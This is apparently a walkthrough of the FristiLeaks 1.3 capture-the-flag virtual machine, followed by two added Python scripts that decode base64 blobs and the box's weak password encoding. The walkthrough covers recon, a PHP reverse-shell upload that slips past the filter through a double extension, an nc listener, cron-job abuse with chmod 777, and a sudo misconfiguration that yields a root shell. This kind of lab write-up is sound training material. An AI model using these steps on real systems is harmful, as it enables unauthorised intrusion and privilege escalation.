FristiLeaks: 1.3

Reference

Write-up

  • Recon:
    • nmap -A 10.0.2.144
      80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
      | http-methods:
      |_  Potentially risky methods: TRACE
      | http-robots.txt: 3 disallowed entries
      |_/cola /sisi /beer
      |_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
      |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
      
    • nikto -host 10.0.2.144
      + Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
      + Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
      + Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
      + "robots.txt" contains 3 entries which should be manually viewed.
      
    • The /cola, /sisi and /beer entries from robots.txt hold no further clues.
    • Since all three are drink names and the front page says KEEP CALM AND DRINK FRISTI, try /fristi => Bingo
  • http://10.0.2.144/fristi => a login page
    • Right-click, view source: a comment names the author as eezeepz
    • The image is one very long inline base64-encoded image, and at the end of the source there is a second, commented-out base64 string; let's try rendering it:
      
      • Paste that base64 string in place of the original image's base64 data:
        data:img/png;base64, iVBORw0KGgo...U5ErkJggg==
        
      • A different image is displayed; it reads: KeKkeKKeKKeKkEkkEk
    • Log in with eezeepz:KeKkeKKeKKeKkEkkEk
  • Upload a PHP backdoor, with an extra extension added to the file name: php-reverse-shell.php.jpg
    • On our attacking machine, listen on port 1234: nc -vnlp 1234
    • Browse to the uploaded file to open the shell: 10.0.2.144/fristi/uploads/php-reverse-shell.php.jpg
  • Spawn a tty:
    echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
    python /tmp/asdf.py
    
  • notes.txt is found in /home/eezeepz/:

    cat notes.txt
    Yo EZ,
    
    I made it possible for you to do some automated checks, 
    but I did only allow you access to /usr/bin/* system binaries. I did
    however copy a few extra often needed commands to my 
    homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
    from /home/admin/
    
    Don't forget to specify the full path for each binary!
    
    Just put a file called "runthis" in /tmp/, each line one command. The 
    output goes to the file "cronresult" in /tmp/. It should 
    run every minute with my account privileges.
    
    - Jerry
    
    • It says chmod can be run from /home/admin/, and that cron periodically runs the commands listed in /tmp/runthis with admin's privileges:
      • echo "/home/admin/chmod -R 777 /home/admin" > /tmp/runthis
      • A minute later we have permission to enter /home/admin/
  • There are three clues in /home/admin/:

    bash-4.1$ cat whoisyourgodnow.txt
    =RFn0AKnlMHMPIzpyuTI0ITG
    
    bash-4.1$ cat cryptedpass.txt
    mVGZ3O3omkJLmy2pcuTq
    
    bash-4.1$ cat cryptpass.py
    #Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
    
    import base64,codecs,sys
    
    def encodeString(str):
        base64string= base64.b64encode(str)
        return codecs.encode(base64string[::-1], 'rot13')
    
    cryptoResult=encodeString(sys.argv[1])
    print cryptoResult
    
    • cryptpass.py is clearly the encoding routine (base64, reverse, rot13), so we can write its inverse to decode cryptedpass.txt, which yields thisisalsopw123:
    import base64, codecs

    ciphertext = 'mVGZ3O3omkJLmy2pcuTq'
    # rot13 is its own inverse, and reversing undoes the [::-1] in encodeString
    decoded_codecs = codecs.encode(ciphertext[::-1], 'rot13')
    # finally undo the base64 layer
    plaintext = base64.b64decode(decoded_codecs)
    print(plaintext.decode())
    
    • Decoding the other string (whoisyourgodnow.txt) the same way gives LetThereBeFristi!
    • Log in as fristigod:LetThereBeFristi!
  • Check .bash_history in /var/fristigod/:
    sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
    
    • doCom has the setuid bit set and is owned by root:
      • -rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom
    • Check which commands we may run with sudo: sudo -l
      User fristigod may run the following commands on this host:
      (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
      
      • fristigod is allowed to run doCom as user fristi
    • Run doCom as fristi and have it call /bin/sh to get a shell:
      • sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/sh
  • The flag is in /root/: Y0u_kn0w_y0u_l0ve_fr1st1
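
As an added example (not part of the original write-up), a Python 3 script that automates the manual step from the /fristi page: pull base64 blobs out of a page's data: URIs and HTML comments, decode them and identify the file type from its magic bytes. The HTML and the two PNG-headed blobs below are constructed for the demo, not taken from the VM.

```python
import base64
import re

# File types recognised from their leading magic bytes.
MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg", b"GIF8": "gif"}

DATA_URI_RE = re.compile(r"data:[\w/+.-]+;base64,\s*([A-Za-z0-9+/=\s]+)")
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/=\s]{40,}")  # a long base64-looking run


def identify(blob: bytes) -> str:
    """Classify a decoded blob by its magic bytes ('unknown' if none match)."""
    for magic, kind in MAGIC.items():
        if blob.startswith(magic):
            return kind
    return "unknown"


def find_hidden_blobs(html: str):
    """Return [(location, kind, decoded_bytes)] for every base64 payload found
    either in a data: URI or inside an HTML comment (the trick used on /fristi)."""
    found = []
    for m in DATA_URI_RE.finditer(html):
        blob = base64.b64decode(re.sub(r"\s", "", m.group(1)))
        found.append(("data-uri", identify(blob), blob))
    for c in COMMENT_RE.finditer(html):
        for run in B64_RUN_RE.finditer(c.group(1)):
            try:
                blob = base64.b64decode(re.sub(r"\s", "", run.group(0)), validate=True)
            except ValueError:  # not actually base64, skip it
                continue
            found.append(("comment", identify(blob), blob))
    return found


# Constructed sample page (not the VM's real HTML): one visible data: URI image
# and a second, commented-out blob; both blobs are just a PNG header plus filler.
_VISIBLE = base64.b64encode(b"\x89PNG\r\n\x1a\n" + b"\x00" * 24).decode()
_HIDDEN = base64.b64encode(b"\x89PNG\r\n\x1a\n" + b"\x01" * 24).decode()
SAMPLE_HTML = f"""<html><body>
<img src="data:img/png;base64,{_VISIBLE}">
<p>KEEP CALM AND DRINK FRISTI</p>
<!-- by eezeepz -->
<!--
{_HIDDEN[:20]}
{_HIDDEN[20:]}
-->
</body></html>"""

if __name__ == "__main__":
    for loc, kind, blob in find_hidden_blobs(SAMPLE_HTML):
        print(f"{loc}: {kind}, {len(blob)} bytes")
```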

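The cryptpass.py scheme, as an added Python 3 example that is not from the write-up or the VM: it re-implements encodeString and its inverse as functions, then checks both strings from /home/admin/ round-trip. Because no key is involved, the scheme is a reversible encoding rather than encryption; anyone holding the script can recover the stored passwords.

```python
import base64
import codecs


def encode_string(plaintext: str) -> str:
    """Python 3 re-implementation of cryptpass.py's encodeString:
    base64 -> reverse -> rot13. Nothing here depends on a secret."""
    b64 = base64.b64encode(plaintext.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")


def decode_string(ciphertext: str) -> str:
    """Invert encode_string. rot13 is its own inverse and acts per character,
    so it commutes with the reversal; '=' padding passes through rot13 unchanged."""
    b64 = codecs.encode(ciphertext, "rot13")[::-1]
    return base64.b64decode(b64).decode()


# The two values found in /home/admin/ on the box.
CRYPTEDPASS = "mVGZ3O3omkJLmy2pcuTq"        # cryptedpass.txt
WHOISYOURGODNOW = "=RFn0AKnlMHMPIzpyuTI0ITG"  # whoisyourgodnow.txt

if __name__ == "__main__":
    for c in (CRYPTEDPASS, WHOISYOURGODNOW):
        p = decode_string(c)
        assert encode_string(p) == c  # round-trip check against the original
        print(f"{c} -> {p}")
```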